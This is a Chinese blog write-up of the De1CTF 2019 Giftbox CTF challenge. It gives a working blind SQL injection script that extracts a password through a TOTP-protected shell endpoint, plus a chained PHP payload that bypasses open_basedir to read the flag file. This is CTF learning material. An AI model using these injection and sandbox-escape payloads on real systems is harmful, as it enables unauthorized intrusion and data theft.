[De1CTF 2019]Giftbox

刚进来我以为是直接给了shell,恐怖如斯。

随便扔了个命令,之后就没然后了,hhh,截包发现可能存在sql注入。

然后我就不会了。。。

what i learn?

the first part:

可以看到ls命令的回显:

[de1ta@de1ta-mbp /sandbox]% ls

totp err, server timestamp:1595945786.8731

告诉我们totp发生了错误。

TOTP

totp是啥? //以下来源于百度

TOTP算法(Time-based One-time Password algorithm)是一种从共享密钥和当前时间计算一次性密码的算法。 它已被采纳为Internet工程任务组标准RFC 6238,是Initiative for Open Authentication(OATH)的基石,并被用于许多双因素身份验证系统。

TOTP是基于散列的消息认证码(HMAC)的示例。 它使用加密哈希函数将密钥与当前时间戳组合在一起以生成一次性密码。 由于网络延迟和不同步时钟可能导致密码接收者必须尝试一系列可能的时间来进行身份验证,因此时间戳通常以30秒的间隔增加,从而减少了潜在的搜索空间。

TOTP基于具有时间戳计数器的OTP,通过定义纪元(T0)的开始并以时间间隔(TI)为单位计数,将当前时间戳变为整数时间计数器(TC)。

需要安装pyotp模块。

在服务端上:

服务端为每个用户生成一个 base32 的密钥 base32secret3232,保存在服务器数据库中 , 代码为 pyotp.random_base32()。  

服务端在匹配时使用 totp = pyotp.TOTP('base32secret3232') 和

totp.now() 即可获得当前动态口令。

pyotp的TOTP的使用说明(官网):

totp = pyotp.TOTP('base32secret3232')

totp.now() # => 492039

# OTP verified for current time

totp.verify(492039) # => True

time.sleep(30)

totp.verify(492039) # => False

简单应用:

>>> import base64

>>> base64.b32encode('This is my secret key')

'KRUGS4ZANFZSA3LZEBZWKY3SMV2CA23FPE======'

>>> secretKey = base64.b32encode('This is my secret key')

>>> import pyotp

>>> totp = pyotp.TOTP(secretKey)

>>> totp.now()

423779

返回题目

针对这道题,首先查看要去找到他这个totp的算法接口,就是在http://df19d8f1-08dd-4c71-acdc-abd56b5b155d.node3.buuoj.cn/js/totp.min.js

进去看一下找一下秘钥:找不到,根据wp知道是在js目录下有个压缩包,可以找到。

他的提示在main.js当中:

/*

[Developer Notes]

OTP Library for Python located in js/pyotp.zip

Server Params:

digits = 8

interval = 5

window = 1

*/

暗示的很明显,同时将:

digits = 8

interval = 5

都告诉我们了,

另外key也出现了在这里:

 if (commandList.indexOf(command) === -1) {

      $.ajax({

        url: host + '/shell.php?a='+encodeURIComponent(input)+'&totp=' + new TOTP("GAXG24JTMZXGKZBU",8).genOTP(),

        type: "GET",

        dataType: 'json'

爆破脚本:

import requests

import urllib

import string

import pyotp

url = 'http://127.0.0.1/shell.php?a=%s&totp=%s'

totp = pyotp.TOTP("GAXG24JTMZXGKZBU", digits=8, interval=5)

s = requests.session()

length = 0

left = 0x0

right = 0xff

while True:

    mid = int((right - left) / 2 + left)

    if mid == left:

        length = mid

        break

    username = "'/**/or/**/if(length((select/**/password/**/from/**/users/**/limit/**/1))>=%d,1,0)#" % mid

    password = "b"

    payload = 'login %s %s' % (username, password)

    payload = urllib.quote(payload)

    payload = url % (payload, totp.now())

    res = s.get(payload).text

    if 'incorrect' in res:

        left = mid

    else:

        right = mid

print(length)

real_password = ''

for i in range(1, length+1):

    left = 0x20

    right = 0x7e

    while True:

        mid = int((right - left) / 2 + left)

        if mid == left:

            real_password += chr(mid)

            break

        username = "'/**/or/**/if(ascii(substr((select/**/password/**/from/**/users/**/limit/**/1),%d,1))>=%d,1,0)#" % (i, mid)

        password = "b"

        payload = 'login %s %s' % (username, password)

        payload = urllib.quote(payload)

        payload = url % (payload, totp.now())

        res = s.get(payload).text

        if 'incorrect' in res:

            left = mid

        else:

            right = mid

    print(real_password)

    if len(real_password) < i:

        print('No.%d char not in range' % i)

        break

脚本也是嫖来的,在这段脚本中后半部分主要是利用二分法来爆出数据,即password,最后是hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}

脚本的前半段是判断password的长度。

满足服务其关键的地方在于:

    payload = 'login %s %s' % (username, password)

    payload = urllib.quote(payload)    //进行url编码,防止字符对数据包产生影响

    payload = url % (payload, totp.now())  //这一步对最终的url实现填充的效果第一段为payload,第二段为当前的动totp值。

    res = s.get(payload).text

s在前面有写到了:

url = 'http://127.0.0.1/shell.php?a=%s&totp=%s'

totp = pyotp.TOTP("GAXG24JTMZXGKZBU", digits=8, interval=5)

s = requests.session()

接下来就是对于绕过open_basedir了。

脚本如下:

import requests

import urllib

import string

import pyotp

url = 'http://127.0.0.1/shell.php?a=%s&totp=%s'

totp = pyotp.TOTP("GAXG24JTMZXGKZBU", digits=8, interval=5)

s = requests.session()

def login(password):

    username = 'admin'

    payload = 'login %s %s' % (username, password)

    payload = urllib.quote(payload)

    payload = url % (payload, totp.now())

    s.get(payload)

def destruct():

    payload = 'destruct'

    payload = urllib.quote(payload)

    payload = url % (payload, totp.now())

    s.get(payload)

def targeting(code, position):

    payload = 'targeting %s %s' % (code, position)

    payload = urllib.quote(payload)

    payload = url % (payload, totp.now())

    s.get(payload)

def launch():

    payload = 'launch'

    payload = urllib.quote(payload)

    payload = url % (payload, totp.now())

    return s.get(payload).text

login('hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}')

destruct()

targeting('a','chr')

targeting('b','{$a(46)}')

targeting('c','{$b}{$b}')

targeting('d','{$a(47)}')

targeting('e','js')

targeting('f','open_basedir')

targeting('g','chdir')

targeting('h','ini_set')

targeting('i','file_get_')

targeting('j','{$i}contents')

targeting('k','{$g($e)}')

targeting('l','{$h($f,$c)}')

targeting('m','{$g($c)}')

targeting('n','{$h($f,$d)}')

targeting('o','{$d}flag')

targeting('p','{$j($o)}')

targeting('q','printf')

targeting('r','{$q($p)}')

print(launch())

[De1CTF 2019]Giftbox 分析&&TPOP学习的更多相关文章

  1. 刷题记录:[De1CTF 2019]Giftbox && Comment

    目录 刷题记录:[De1CTF 2019]Giftbox && Comment 一.知识点 1.sql注入 && totp 2.RCE 3.源码泄露 4.敏感文件读取 ...

  2. Linux内核分析第一次学习报告

    Linux内核分析第一次学习报告 学生 黎静 学习内容 1.存储程序计算机工作模型 冯诺依曼体系结构:核心思想为存储程序计算机. CPU抽象为for循环,总是执行下一条指令,内存保存指令和数据,CPU ...

  3. [转] 用协议分析工具学习TCP/IP

    一.前言 目前,网络的速度发展非常快,学习网络的人也越来越多,稍有网络常识的人都知道TCP/IP协议是网络的基础,是Internet的语言,可以说没有TCP/IP协议就没有互联网的今天.目前号称搞网的 ...

  4. (转)2019年 React 新手学习指南 – 从 React 学习线路图说开去

    原文:https://www.html.cn/archives/10111 注:本文根据 React 开发者学习线路图(2018) 结构编写了很多新手如何学习 React 的建议.2019 年有标题党 ...

  5. 刷题记录:[De1CTF 2019]SSRF Me

    目录 刷题记录:[De1CTF 2019]SSRF Me 一.涉及知识点 1.MD5长度扩展攻击 2.Python 2.x - 2.7.16 urllib.fopen支持local_file导致LFI ...

  6. [De1CTF 2019]SSRF Me

    原帖地址 : https://xz.aliyun.com/t/5927 De1CTF 2019 的一个题目总结 题目描述 直接查看页面源代码可以看到正确格式的代码 #! /usr/bin/env py ...

  7. druid 源码分析与学习(含详细监控设计思路的彩蛋)(转)

    原文路径:http://herman-liu76.iteye.com/blog/2308563  Druid是阿里巴巴公司的数据库连接池工具,昨天突然想学习一下阿里的druid源码,于是下载下来分析了 ...

  8. cc2530 makefile简略分析 <contiki学习之三>

    前面将contiki的makefile框架都理了下,这篇就以cc2530为收篇吧,也即makefile分析就该到此为止了. contiki/examples/cc2530dk 打开Makefile如下 ...

  9. contiki makefile框架分析 < contiki学习之一 >

    在linux下的工程编译,基本都可以使用makefile这个工具来完成.Contiki OS亦如此,下面分析contiki整个Makefile的框架,对makefile的具体内容暂不做分析.本文依赖于 ...

随机推荐

  1. Docker Run Cadvisor failed: inotify_add_watch /sys/fs/cgroup/cpuacct,cpu: no such file or directory

    原文链接:https://blog.csdn.net/poem_2010/article/details/84836816 没有找这个文件, 这是一个bug,在系统中,是cpu,cpuacct 可以去 ...

  2. 仿京东BOE官网 jQuery代码

    $(function() { $("#chanping").mouseenter(function() { $("#column").slideDown(500 ...

  3. Java数据结构——顺序表

    一个线性表是由n(n≥0)个数据元素所构成的有限序列. 线性表逻辑地表示为:(a0,a1,…,an-1).其中,n为线性表的长度,n=0时为空表.i为ai在线性表中的位序号. 存储结构:1.顺序存储, ...

  4. OMG,12 个精致的 Java 字符串操作小技巧,学它

    字符串可以说是 Java 中最具有代表性的类了,似乎没有之一哈,这就好像直播界的李佳琪,脱口秀中的李诞,一等一的大哥地位.不得不承认,最近吐槽大会刷多了,脑子里全是那些段子,写文章都有点不由自主,真的 ...

  5. 多商铺平台手机电脑自适应宣传展示平台店铺javassh项目代码线上

    部署运行:eclipse 建议使用jdk 1.8 + ,Tomcat 8.0 + 系统介绍: 1.网站后台采用主流的 SSH框架 jsp JSTL,网站前台采用Angular jS框架 2.网站前端采 ...

  6. Laravel Reponse 响应客户端

    Laravel Response 响应客户端 本篇文章逻辑较长,只说明和响应生命周期相关的必要代码. 本文主要内容顺序为: 1.执行上文管道中的then方法指定的闭包,路由的分发 2.在路由器中(Ro ...

  7. 华为荣耀5X(畅玩版 全网通)USB调试模式如何开启教程(开发者模式 开发者选项打开)

    作者:程序员小冰,CSDN博客:http://blog.csdn.net/qq_21376985, 前一段时间,公司买了一款华为荣耀畅玩版5X全网通,进行测试.发现 拿usb数据线连接PC电脑,无法进 ...

  8. 【Android】Android开发点击查看手机电量的小功能。学习广播的一个小技能小Demo

    作者:程序员小冰,GitHub主页:https://github.com/QQ986945193 微博:http://weibo.com/mcxiaobing 首先给大家看一下效果图: 先写一个广播类 ...

  9. Jmeter简单操作 取样器 ,监听器

    1.创建线程组 1.2 (1)  线程组主要包含三个参数:线程数.准备时长(Ramp-Up Period(in seconds)).循环次数. (2) 线程数:虚拟用户数.一个虚拟用户占用一个进程或线 ...

  10. 使用grep命令查找文件中符合”.stg.“行

    某目录下有个test.txt,内容如下: www.stg.comwwstgcom 如果我这样去查找: $ grep '.stg.' test.txtwww.stg.comwwstgcom 发现第二个匹 ...